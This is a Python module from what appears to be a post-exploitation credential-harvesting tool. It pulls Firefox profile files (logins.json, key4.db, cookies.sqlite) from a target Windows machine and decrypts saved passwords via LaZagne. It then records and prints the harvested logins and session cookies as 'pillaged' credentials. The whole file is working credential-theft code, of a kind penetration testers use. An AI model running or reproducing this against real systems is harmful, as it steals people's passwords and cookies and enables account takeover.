166 lines
6.8 KiB
Python
166 lines
6.8 KiB
Python
import ntpath
|
|
import sys
|
|
import sqlite3,os,json,base64,binascii
|
|
from lib.toolbox import bcolors
|
|
from lib.dpapi import *
|
|
from lazagne.softwares.browsers.mozilla import Mozilla, firefox_browsers
|
|
from lazagne.config import constant
|
|
|
|
|
|
class FIREFOX_LOGINS:
|
|
def __init__(self, options,logger,user,fileops,db):
|
|
self.logindata_path = None
|
|
self.localstate_path = None
|
|
self.localstate_dpapi = None
|
|
self.cookie_path = None
|
|
self.options = options
|
|
self.logging= logger
|
|
self.myfileops = fileops
|
|
self.db = db
|
|
self.aeskey = None
|
|
self.masterkey = None
|
|
self.masterkey_guid = None
|
|
self.logins = {}
|
|
self.cookies = {}
|
|
self.user = user
|
|
self.lasagne_firefox_browsers = firefox_browsers
|
|
self.lasagne_Mozilla = None
|
|
|
|
def get_files(self):
|
|
try:
|
|
#files_to_get = os.path.join(profile, 'signons.sqlite')) (profile, 'logins.json')key3.db , key4.db
|
|
#directory_to_get = ['']
|
|
for mybrowser in firefox_browsers:
|
|
blacklist = ['.', '..']
|
|
browser_path=mybrowser[1] #PATH Style is (u'firefox', u'{APPDATA}\\Mozilla\\Firefox'),
|
|
browser_name=mybrowser[0]
|
|
APPDATA=f"Users\\{self.user.username}\\AppData\\Roaming"
|
|
|
|
path = browser_path.format(APPDATA=APPDATA)
|
|
self.logging.debug(f"[{self.options.target_ip}] [+] Looking for Mozilla {browser_name} Profile Files in {path}")
|
|
try:
|
|
# Downloading profile file
|
|
localfile = self.myfileops.get_file(ntpath.join(path, 'profiles.ini'))
|
|
if localfile!=None :
|
|
self.logging.debug(f"[{self.options.target_ip}] [+] Found {bcolors.OKBLUE}{self.user.username}{bcolors.ENDC} Mozilla {browser_name} Profile files : {ntpath.join(path, 'profiles.ini')}")
|
|
else:
|
|
continue
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception Getting Files profiles.ini for Mozilla {browser_name} - browser doesn't exist{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
continue
|
|
#Into profiles directories
|
|
tmp_pwd = ntpath.join(path, 'Profiles')
|
|
my_directory = self.myfileops.do_ls(tmp_pwd, wildcard='*', display=False)
|
|
for infos in my_directory:
|
|
longname, is_directory = infos
|
|
self.logging.debug("ls returned file %s" % longname)
|
|
if longname not in blacklist and is_directory :# and longname=='profiles.ini':
|
|
try:
|
|
self.logging.debug(f"[{self.options.target_ip}] [+] Found {bcolors.OKBLUE}{self.user.username}{bcolors.ENDC} Mozilla Profile Directory : {longname}")
|
|
# Downloading profile important files
|
|
for file_to_dl in ['signons.sqlite','logins.json','key3.db', 'key4.db','cookies.sqlite','cookies.sqlite-wal','cookies.sqlite-shm']:
|
|
try:
|
|
localfile = self.myfileops.get_file(ntpath.join(ntpath.join(tmp_pwd, longname),file_to_dl),allow_access_error=True)
|
|
if file_to_dl=='cookies.sqlite' and localfile :
|
|
self.get_cookies(localfile)
|
|
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception Getting Files for Mozilla{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
continue
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception Getting Files for Mozilla{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
continue
|
|
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception FIREFOX get_files{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
return None
|
|
|
|
def get_cookies(self,localfile):
|
|
"""
|
|
Get encrypted data (user / password) and host from the json or sqlite files
|
|
"""
|
|
try:
|
|
conn = sqlite3.connect(localfile)
|
|
c = conn.cursor()
|
|
c.execute('SELECT name,value,host,path,expiry,isSecure FROM moz_cookies;')
|
|
|
|
# Using sqlite3 database
|
|
for row in c:
|
|
name = row[0]
|
|
value = row[1]
|
|
host = row[2]
|
|
path = row[3]
|
|
expiry = row[4]
|
|
self.db.add_cookies(credz_type='browser-firefox',
|
|
credz_name=name,
|
|
credz_value=value,
|
|
credz_expires_utc=expiry,
|
|
credz_target=host,
|
|
credz_path=path,
|
|
pillaged_from_computer_ip=self.options.target_ip,
|
|
pillaged_from_username=self.user)
|
|
self.logging.info(
|
|
f"[{self.options.target_ip}] [+] {bcolors.OKGREEN}[Mozilla Cookie] {bcolors.ENDC} for {host} {bcolors.OKBLUE}[ {name}:{value} ] {bcolors.ENDC} expire time: {(datetime.fromtimestamp(expiry)).strftime('%b %d %Y %H:%M:%S')}")
|
|
return 1
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] Firefox Cookie decoding exception : {ex}")
|
|
|
|
def run(self):
|
|
#Download needed files
|
|
self.get_files()
|
|
#Set new starting path
|
|
#Extract from Lazagne config
|
|
profile = {
|
|
'APPDATA': u'{drive}:\\Users\\{user}\\AppData\\Roaming\\',
|
|
'USERPROFILE': u'{drive}:\\Users\\{user}\\',
|
|
'HOMEDRIVE': u'{drive}:',
|
|
'HOMEPATH': u'{drive}:\\Users\\{user}',
|
|
'ALLUSERSPROFILE': u'{drive}:\\ProgramData',
|
|
'COMPOSER_HOME': u'{drive}:\\Users\\{user}\\AppData\\Roaming\\Composer\\',
|
|
'LOCALAPPDATA': u'{drive}:\\Users\\{user}\\AppData\\Local',
|
|
}
|
|
APPDATA=profile['APPDATA'].replace('{drive}:','{download_path}')
|
|
APPDATA=APPDATA.format(download_path=self.myfileops.get_download_directory(),user=self.user.username)
|
|
|
|
#Run Lasagne
|
|
for mybrowser in firefox_browsers:
|
|
try:
|
|
name=mybrowser[0]
|
|
path=mybrowser[1]
|
|
browserpath=path.format(APPDATA=APPDATA).replace('\\','/')
|
|
myMozilla=Mozilla(name,browserpath,logger=self.logging)
|
|
pwd_found = myMozilla.run()
|
|
if len(pwd_found)>0:
|
|
longname=name
|
|
self.user.files[longname] = {}
|
|
self.user.files[longname]['type'] = 'MozillaLoginData'
|
|
self.user.files[longname]['status'] = 'decrypted'
|
|
self.user.files[longname]['path'] = browserpath
|
|
|
|
for finding in pwd_found:
|
|
self.logins[finding['URL']] = {}
|
|
self.logins[finding['URL']]['username'] = finding['Login']
|
|
self.logins[finding['URL']]['password'] = finding['Password']
|
|
############PROCESSING DATA
|
|
self.db.add_credz(credz_type='browser-firefox',
|
|
credz_username=finding['Login'],
|
|
credz_password=finding['Password'],
|
|
credz_target=finding['URL'],
|
|
credz_path=browserpath,
|
|
pillaged_from_computer_ip=self.options.target_ip,
|
|
pillaged_from_username=self.user.username)
|
|
self.logging.info(
|
|
f"[{self.options.target_ip}] [+] {bcolors.OKGREEN} [Firefox Password] {bcolors.ENDC} for {finding['URL']} [ {bcolors.OKBLUE}{self.logins[finding['URL']]['username']} : {self.logins[finding['URL']]['password']}{bcolors.ENDC} ]")
|
|
self.user.files[longname]['secret'] = self.logins
|
|
|
|
|
|
except Exception as ex:
|
|
self.logging.debug( f"[{self.options.target_ip}] {bcolors.WARNING}Exception decrypting logindata for Mozilla {self.user.username} {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
continue
|
|
return self.logins
|